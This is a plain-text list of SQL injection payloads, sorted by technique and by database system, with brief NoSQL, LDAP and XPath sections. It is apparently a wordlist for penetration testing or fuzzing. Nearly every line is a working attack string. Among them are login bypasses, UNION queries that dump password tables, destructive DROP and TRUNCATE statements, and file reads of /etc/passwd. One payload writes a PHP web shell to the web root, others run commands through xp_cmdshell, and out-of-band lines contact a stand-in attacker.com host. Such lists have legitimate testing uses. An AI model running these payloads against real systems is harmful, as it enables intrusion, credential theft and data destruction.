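# SQL Injection Payloads
# Grouped by technique and by DBMS. The final sections (NoSQL, LDAP, XPATH) cover related injection classes that are not SQL.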

# Basic SQL Injection
' OR '1'='1
' OR '1'='1' --
' OR '1'='1' /*
' OR 1=1 --
' OR 1=1 /*
" OR "1"="1
" OR "1"="1" --
" OR "1"="1" /*

# Union-Based SQL Injection
' UNION SELECT NULL, NULL --
' UNION SELECT username, password FROM users --
' UNION SELECT NULL, NULL, NULL --
' UNION SELECT 1,2,3,4,5 --
' UNION SELECT database(), user(), version() --
' UNION ALL SELECT NULL, NULL --
' UNION ALL SELECT 1,2,3 --

# Error-Based SQL Injection
' AND 1=CONVERT(int, (SELECT @@version)) --
' AND 1=CAST((SELECT @@version) AS int) --
' AND 1=1/0 --
' AND 1=GTID_SUBSET(@@version,0) --

# Blind SQL Injection (time-delay probes; MySQL SLEEP/BENCHMARK syntax)
' AND SLEEP(5) --
' AND IF(1=1,SLEEP(5),0) --
' AND (SELECT * FROM (SELECT(SLEEP(5)))a) --
' AND BENCHMARK(10000000,MD5(1)) --
' AND 1=1 AND SLEEP(5) --
' AND 1=2 AND SLEEP(5) --

# Time-Based SQL Injection (delay conditional on a tested value; MySQL syntax)
' AND IF(SUBSTRING(@@version,1,1)='5',SLEEP(5),0) --
' AND IF(ASCII(SUBSTRING((SELECT database()),1,1))>100,SLEEP(5),0) --
' AND IF(ASCII(SUBSTRING((SELECT user()),1,1))>100,SLEEP(5),0) --

# Out-of-Band SQL Injection
'; EXEC xp_cmdshell('ping attacker.com') --
'; EXEC master..xp_dirtree '\\attacker.com\share' --
' UNION SELECT LOAD_FILE('\\\\attacker.com\\share') --

# MySQL Specific
' AND (SELECT 1 FROM (SELECT COUNT(*),CONCAT(@@version,FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a) --
' AND (SELECT 1 FROM (SELECT COUNT(*),CONCAT((SELECT database()),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a) --
' AND (SELECT 1 FROM (SELECT COUNT(*),CONCAT((SELECT user()),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a) --

# PostgreSQL Specific (note: the @@version entry below uses SQL Server/MySQL variable syntax, not PostgreSQL syntax)
' AND (SELECT CAST(@@version AS INTEGER)) --
' AND (SELECT 1/COUNT(*) FROM pg_class WHERE relname=(SELECT CURRENT_DATABASE())) --
' AND (SELECT 1 FROM (SELECT PG_SLEEP(5))a) --

# Microsoft SQL Server Specific
' AND (SELECT @@version) --
' AND (SELECT DB_NAME()) --
' AND (SELECT SYSTEM_USER) --
' AND (SELECT @@SERVERNAME) --
' AND 1=CONVERT(int,@@version) --

# Oracle Specific
' AND (SELECT 1 FROM dual) --
' AND (SELECT banner FROM v$version WHERE rownum=1) --
' AND (SELECT 1 FROM dual WHERE DBMS_PIPE.RECEIVE_MESSAGE(('a'),5)=1) --

# Advanced SQL Injection (stacked statements that modify data or schema; destructive)
'; DROP TABLE users; --
'; UPDATE users SET password='hacked' WHERE username='admin'; --
'; INSERT INTO users (username, password) VALUES ('hacker', 'hacked'); --
'; ALTER TABLE users ADD COLUMN hacked VARCHAR(255); --
'; CREATE TABLE hacked (data TEXT); --
'; TRUNCATE TABLE users; --

# Bypass Techniques
'/**/OR/**/'1'='1
'/*!50000OR*/'1'='1
'/*!50000UNION*//*!50000SELECT*/1,2,3
'%0AOR%0A'1'='1
'%0DOR%0D'1'='1

# Hexadecimal Encoding (hex literals of ' OR '1'='1 and ' OR '1'='1' --)
0x27204f52202731273d2731
0x27204f52202731273d273127202d2d

# Unicode Encoding (non-standard %uXXXX URL encoding of the same two strings)
%u0027%u0020%u004f%u0052%u0020%u0027%u0031%u0027%u003d%u0027%u0031
%u0027%u0020%u004f%u0052%u0020%u0027%u0031%u0027%u003d%u0027%u0031%u0027%u0020%u002d%u002d

# Double Encoding (URL-encoded twice; input must be fully decoded before filtering or rule matching)
%2527%2520%254f%2552%2520%2527%2531%2527%253d%2527%2531
%2527%2520%254f%2552%2520%2527%2531%2527%253d%2527%2531%2527%2520%252d%252d

# Case Variation
SeLeCt 1,2,3
UnIoN SeLeCt 1,2,3
UnIoN AlL SeLeCt 1,2,3

# Comment Variations
' OR '1'='1' --
' OR '1'='1' /*
' OR '1'='1' #
' OR '1'='1' -- -
' OR '1'='1' /*! */

# Boolean-Based Blind
' AND ASCII(SUBSTRING((SELECT database()),1,1))>100 --
' AND ASCII(SUBSTRING((SELECT user()),1,1))>100 --
' AND ASCII(SUBSTRING((SELECT @@version),1,1))>100 --

# Information Schema Queries
' UNION SELECT table_name, column_name FROM information_schema.columns --
' UNION SELECT table_schema, table_name FROM information_schema.tables --
' UNION SELECT column_name, data_type FROM information_schema.columns WHERE table_name='users' --

# User Enumeration
' UNION SELECT user, password FROM mysql.user --
' UNION SELECT name, password_hash FROM sys.sql_logins --
' UNION SELECT username, password FROM dba_users --

# Database Enumeration
' UNION SELECT schema_name, NULL FROM information_schema.schemata --
' UNION SELECT table_name, table_schema FROM information_schema.tables --
' UNION SELECT column_name, table_name FROM information_schema.columns --

# File System Access
' UNION SELECT LOAD_FILE('/etc/passwd'), NULL --
' UNION SELECT LOAD_FILE('C:\\Windows\\win.ini'), NULL --
' INTO OUTFILE '/tmp/backdoor.php' --
' INTO DUMPFILE '/tmp/backdoor.php' --

# Command Execution
' UNION SELECT '<?php system($_GET["cmd"]); ?>', NULL INTO OUTFILE '/var/www/html/shell.php' --
'; EXEC xp_cmdshell('dir C:\\') --
'; EXEC master..xp_cmdshell('ping 127.0.0.1') --

# Authentication Bypass
admin' --
admin' OR '1'='1
admin' OR '1'='1' --
admin' OR '1'='1' /*
admin' OR 1=1 --
admin' OR 1=1 /*
admin' OR 'a'='a
admin' OR 'a'='a' --

# Password Bypass
' OR '1'='1' LIMIT 1 --
' OR '1'='1' LIMIT 1,1 --
' OR '1'='1' ORDER BY 1 --
' OR '1'='1' GROUP BY 1 --

# Stacked Queries
'; SELECT 'hacked' --
'; SELECT * FROM users --
'; SELECT @@version; --

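# Second Order SQL Injection (input that is stored first and concatenated into a later query; the strings below are ordinary UNION payloads)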
' UNION SELECT (SELECT password FROM users WHERE username='admin'), NULL --
' UNION SELECT (SELECT @@version), NULL --

# NoSQL Injection
{"$ne": null}
{"$gt": ""}
{"$regex": ".*"}
{"$where": "1==1"}

# JSON Injection (SQL tautologies built on MySQL JSON functions, not injection into JSON documents)
' OR JSON_EXTRACT('{"a":1}', '$.a')=1 --
' OR JSON_CONTAINS('{"a":1}', '1', '$.a') --

# XML Injection (MySQL error-based SQL injection via EXTRACTVALUE/UPDATEXML, not injection into XML documents)
' AND EXTRACTVALUE(1, CONCAT(0x3a, (SELECT @@version))) --
' AND UPDATEXML(1, CONCAT(0x3a, (SELECT @@version)), 1) --

# LDAP Injection
*)(uid=*))(|(uid=*
*))(|(uid=*
admin)(&)
admin*)(&)

# XPATH Injection
' or '1'='1
' or 1=1
' or position()=1

# End of File